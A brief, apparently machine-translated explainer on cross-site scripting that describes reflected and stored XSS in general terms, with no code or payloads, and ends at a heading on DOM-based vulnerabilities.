XSS (Cross-site scripting attacks)

background

1. By finding ways to inject malicious scripts into web pages, an attacker can gain enhanced access to sensitive page content, session cookies, and various other information maintained by the browser on behalf of the user. Cross-site scripting attacks are a case of code injection.

type

Non-persistent (reaction)

  1. These vulnerabilities occur when server-side scripts immediately parse and display the user’s result page using data provided by the Web client (most common HTTP query parameters, such as HTML form submission).
  2. Any unauthenticated user-supplied data contained in a result page that is not properly HTML-encoded can result in tag injection. [12] [13] A classic example of a potential vector is a site-search engine: If a string is searched, the search string is typically redisplayed verbatim on the results page to indicate what was searched. If this response does not escape or reject HTML control characters correctly, a cross-site scripting defect occurs
  3. Response attacks are usually carried out via email or neutral websites. The decoy is an innocent-looking URL that points to a trusted site, but contains an XSS vector. If the trusted site is vulnerable to a bootstrap attack, clicking on the link causes the victim’s browser to execute the injected script.

Persist (or store)

  1. It is the data provided by the attacker is saved by the server, and then returned to the normal browsing process in other users’ “normal” web page permanent display occurs without proper HTML escaping. A typical example is an online message board that allows users to post messages in HTML format for other users to read.

Server-side and DOM-based vulnerabilities